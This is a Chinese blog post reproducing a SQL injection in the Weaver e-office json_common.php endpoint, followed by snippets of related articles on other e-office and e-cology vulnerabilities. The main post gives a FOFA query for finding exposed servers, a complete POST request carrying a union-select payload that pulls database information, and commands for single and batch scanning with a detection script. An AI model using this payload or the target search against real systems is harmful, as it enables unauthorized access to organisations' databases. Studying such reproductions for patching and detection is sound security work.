泛微e-office json_common.php SQL注入漏洞

最新推荐文章于 2025-09-11 17:57:43 发布

原创最新推荐文章于 2025-09-11 17:57:43 发布 · 906 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#json #php #sql

一、漏洞描述

泛微e-office为企业办公提供丰富应用，覆盖常见协作场景，开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求，帮助组织高效管事理人。

系统 json_common.php 文件存在SQL注入漏洞

二、网络空间搜索引擎搜索

fofa查询

app="泛微-EOffice"

三、漏洞复现

poc

POST /building/json_common.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: LOGIN_LANG=cn; PHPSESSID=bd702adc830fba4fbcf5f336471aeb2e
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,user() ,4#|2|333

四、漏洞检测

单个检测

python json_commonSQLcheck.py -u url[例 http://127.0.0.1:8080]

批量检测

python json_commonSQLcheck.py -f filename

关注公众号网络安全透视镜回复 20231018 获取批量检测脚本

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

为赋新词强说愁

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

泛微E-Office SQL注入漏洞复现

0xSec

11-28

2285

泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。

泛微 OA e-cology9 存在 sql 注入

nnn2188185的博客

04-29

1735

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发泛微 E-Cology9 协同办公系统是一套基于 JSP 及 SQL Server 数据库的 OA 系统，包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境，突破企业人、财、物、信息、流程等各种资源之间的屏障，并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上，使企业变成一个电子化的内外部协同工作的组织。

参与评论您还未登录，请先登录后发表或查看评论

挖洞实战——泛微e-office的sql注入漏洞

qq_64875725的博客

11-24

616

0x01 漏洞描述免责声明：文章内容来源于互联网收集整理，仅供学习参考，请勿使用文章内容从事非法测试及恶意攻击，由于传播、利用文章所提供的信息或工具造成的一切损失均由使用者自行承担，并且产生的一切不良后果与文章作者无关。本文章仅供学习参考。0x01 漏洞描述泛微e-office系统 json_common.php 存在SQL注入漏洞，攻击者可利用该漏洞在未授权的情况下获取数据库敏感信息。

【SQL注入系列】JSON注入

最新发布

2302_80252080的博客

09-11

854

JSON是一种轻量级数据交换格式，常用于前后端数据传输。JSON注入是一种安全漏洞，攻击者通过构造特殊输入破坏JSON结构，可能导致XSS、权限绕过或SQL注入等问题。实战演示了通过输入恶意JSON数据获取数据库信息的过程，如使用union select窃取用户名密码。防御措施建议采用参数化查询，从根本上防止注入攻击。本文仅供学习网络安全知识，严禁用于非法用途。

【复现】泛微-EOfficeOA信息泄露漏洞_41

fushuang333的博客

02-06

1551

【复现】泛微-EOfficeOA信息泄露漏洞，未授权导致一些敏感配置信息泄露，可能造成系统危害以及重要信息泄露。

泛微e-office SQL注入漏洞复现

11-03

977

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。

泛微E-Office-json_common.phpSQL注入漏洞

03-30

引用[2]提到泛微E-Office的多个接口存在SQL注入漏洞，包括json_common.php、flow_xml.php等，但用户询问的是_common.php，这里可能是一个笔误或者具体文件名的不同。引用[3]和[4]提到了json_common.php的漏洞，可能...

泛微E-Office系统login_other.php存在sql注入漏洞测试背景

03-30

好的，我需要分析用户关于泛微E-Office系统中login_other.php文件存在SQL注入漏洞的测试方法与背景的询问。首先，我得先理解用户的需求，他们可能想了解如何验证该漏洞是否存在，以及相关的技术背景。根据提供的引用...

ShowDoc item_id 未授权SQL注入漏洞复现

0xSec

06-05

2040

2024年6月，ShowDoc官方发布新版本修复了一个SQL注入漏洞。鉴于该漏洞无前置条件，易于利用，且默认情况下可暴破用户token获取系统后台权限，建议所有使用该系统的企业尽快升级修复，以确保系统安全。

泛微e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本

09-26

对2019年9月新爆的泛微e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。使用方法： 1、运行url存活检测脚本e-cology_OA_rce.py批量定位泛微OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断是否可以拿权限。oa_check.py http://ip:port whoami

泛微E-Office敏感信息泄露和未授权访问漏洞

08-03

2398

泛微e-office系统存在SQL注入漏洞

holyxp的博客

11-02

1238

泛微e-office系统敏感信息泄露漏洞

故事讲予风听

02-24

1225

渗透测试之SQL注入漏洞

sunnygao的博客

09-27

2027

文章目录SQL注入SQL盲注**时间盲注**联合盲注**获取数据库版本和当前操作系统****尝试获取pikachu数据库中的表名****根据经验猜测****尝试获取users表中的字段名**6.尝试获取用户名和密码sql注入步骤怎样防御SQL注入漏洞 SQL注入字符型的注入（加单引号）和数字型的注入 1' or 1=1# 查出所有数据。 SQL盲注在服务器没有错误回显时完成注入攻击，服务器没有回显，对攻击者来说缺少了重要调试信息，所以攻击者必须找到一个方法验证注入的SQL语句是否被执行。分

【1day】泛微e-office OA SQL注入漏洞学习

记录并分享学习安全的知识点..

10-17

741

泛微e-office OA是一种企业级办公自动化（Office Automation）解决方案，由中国的泛微软件（FANWEI）开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。泛微e-office OA存在SQL注入漏洞，攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码，从而在后台数据库中执行未经授权的操作。

14 WEB漏洞：SQL注入之类型及提交注入

qq_52718293的博客

07-02

358

a.数字 b.字符 c.搜索符 4.jsonHTTP头 GET POST COOKIE REQUEST JSON注入相关知识 $_SERVER(php内置变量，可查询数据包或浏览器信息，可以将查询信息改为sql语句)a. 简介 JSON 是存储和交换文本信息的语法，是轻量级的文本数据交换格式。类似xml，但JSON 比 XML 更小、更快，更易解析。所以现在接口数据传输都采用json方式进行。JSON 文本的 MIME 类型是 “application/json”b. JSON语法 ■ 数据在名称/值对中

php sql json防注入,代码审计 | ThinkPHP5漏洞分析之SQL注入(六)

weixin_35810162的博客

03-13

371

原标题：代码审计 | ThinkPHP5漏洞分析之SQL注入(六)ThinkPHPThinkPHP 漏洞分析，也将更新于 ThinkPHP-Vuln(https://github.com/Mochazz/ThinkPHP-Vuln) 项目上。本篇文章，将分析 ThinkPHPSQL注入漏洞 (所有 Mysql 聚合函数相关方法均存在注入)。本次漏洞存在于所有 Mysql 聚合函数相关方法。由于程序...